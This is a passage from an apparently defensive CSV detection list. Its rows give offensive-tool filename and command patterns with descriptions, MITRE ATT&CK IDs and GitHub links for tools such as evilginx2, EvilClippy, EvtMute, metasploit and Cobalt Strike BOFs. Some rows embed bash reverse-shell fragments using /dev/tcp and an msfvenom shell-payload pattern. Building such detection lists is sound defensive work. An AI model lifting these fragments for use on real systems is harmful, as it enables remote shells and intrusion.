T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*EvilClippyManager.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*EvilClippy-master*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*EvilClippyMenu*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,0,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*evilfeed.go*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*evilginx*,offensive_tool_keyword,evilginx,evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies. which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx. released in 2017. which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application. 
which implements its own HTTP and DNS server. making it extremely easy to set up and use,T1556 - T1565 - T1056 - T1558 - T1110,TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilginx.exe*,offensive_tool_keyword,evilginx2,Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication,T1557.002 - T1114 - T1539,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilginx2*,offensive_tool_keyword,evilginx2,Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication,T1557.002 - T1114 - T1539,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilginx-linux*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*evilginx-mastery*,offensive_tool_keyword,evilginx2,Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication,T1557.002 - T1114 - T1539,TA0002 - TA0003 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/kgretzky/evilginx2,1,1,N/A,N/A,10,8326,1638,2023-09-28T22:51:46Z,2018-07-10T09:59:52Z -*evilgophish*,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - 
Collection,https://github.com/fin3ss3g0d/evilgophish,1,1,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*evilgrade*,offensive_tool_keyword,evilgrade,Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents). a working default configuration for fast pentests. and has its own WebServer and DNSServer modules. Easy to set up new settings. and has an autoconfiguration when new binary agents are set,T1565 - T1566 - T1573 - T1203 - T1210 - T1211 - T1212,TA0002 - ,N/A,N/A,Frameworks,https://github.com/infobyte/evilgrade,1,0,N/A,N/A,10,1236,288,2021-09-01T17:08:27Z,2013-04-22T16:08:48Z -*EvilLsassTwin.exe*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*EvilLsassTwin.nim*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*evilmog/ntlmv1-multi*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*EvilnoVNC-main*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,1,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*eviloffice.exe*,offensive_tool_keyword,EvilClippy,A cross-platform assistant for creating malicious MS Office documents,T1566.001 - T1059.001 - T1204.002,TA0004 - TA0002,N/A,N/A,Phishing,https://github.com/outflanknl/EvilClippy,1,1,N/A,10,10,1956,381,2022-05-19T23:00:22Z,2019-03-26T12:14:03Z -*EvilPayload.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*evilqr-main*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*evilqr-phishing*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*evilqr-server*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*evilsocket*,offensive_tool_keyword,Github Username,github username of hacker known for sniffing and spoofing exploitation tools,N/A,N/A,N/A,N/A,Sniffing & Spoofing,https://github.com/evilsocket,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*EvilTwin.dmp*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*EvilTwinServer.nim*,offensive_tool_keyword,EvilLsassTwin,attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.,T1003.001 - T1055 - T1093,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access - Defense Evasion,https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin,1,1,N/A,9,1,39,3,2023-09-11T14:03:21Z,2022-09-13T12:42:13Z -*evil-winrm -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*evil-winrm*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021 - T1028 - T1046 - T1078 - T1091 - T1219,TA0003 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,1,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*EvtMuteHook.dll*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.dll*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.iobj*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.ipdb*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.pdb*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events 
being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMuteHook.sln*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EvtMute-master*,offensive_tool_keyword,EvtMute,This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log,T1562.004 - T1055.001 - T1070.004,TA0040 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/bats3c/EvtMute,1,1,N/A,10,3,240,46,2021-04-24T19:23:39Z,2020-08-29T00:13:20Z -*EVUAC *.exe*,offensive_tool_keyword,cobaltstrike,Beacon Object File implementation of Event Viewer deserialization UAC bypass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/EventViewerUAC_BOF,1,0,N/A,10,10,130,29,2022-05-06T17:43:05Z,2022-05-02T02:08:52Z -*ewby/Mockingjay_BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*ewok -t *,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file ewok (snmpwalk like),T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Information Gathering,https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS,1,0,N/A,N/A,1,32,17,2017-04-20T16:24:49Z,2017-05-13T19:51:23Z -*example-bof.sln*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*examples/netview.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Excel-Exploit.git*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*Excel-Exploit-main*,offensive_tool_keyword,Excel-Exploit,MacroExploit use in excel sheet,T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main,1,1,N/A,N/A,1,21,4,2023-06-12T11:47:52Z,2023-06-12T11:46:53Z -*ExcelReflectImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*excelshellinject.*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*exchange_proxylogon_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exchange_proxynotshell_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exe_dll_shellcode genetic.config*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,0,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*exe_stager.exe*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*exe_to_dll.exe*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll.exe*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll_*.zip*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll_*_32bit.zip*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation 
tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll_*_64bit.zip*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll-master*,offensive_tool_keyword,exe_to_dll,Converts a EXE into DLL,T1027.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hasherezade/exe_to_dll,1,1,N/A,5,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe_to_dll-master*,offensive_tool_keyword,exe_to_dll,Converts an EXE so that it can be loaded like a DLL.,T1055.002 - T1073.001 - T1027,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/hasherezade/exe_to_dll,1,1,N/A,8,10,1095,177,2023-07-26T11:41:27Z,2020-04-16T16:27:00Z -*exe2bat.cpp*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2bat.exe*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2powershell.cpp*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2powershell.exe*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - 
TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exe2powershell-master*,offensive_tool_keyword,exe2powershell,exe2powershell is used to convert any binary file to a bat/powershell file,T1059.001 - T1027.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/yanncam/exe2powershell,1,1,N/A,6,2,153,44,2020-10-15T08:22:30Z,2016-03-02T11:23:32Z -*exec /bin/sh 0&0 2>&0*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*,greyware_tool_keyword,bash,bash reverse shell ,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md,1,0,greyware tool - risks of False positive !,N/A,10,51169,13280,2023-10-02T15:13:46Z,2016-10-18T07:29:07Z -*exec CMD=/bin/sh -f elf -o *.elf*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exec_payload_msi*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exec_shellcode.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*ExecCmdImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
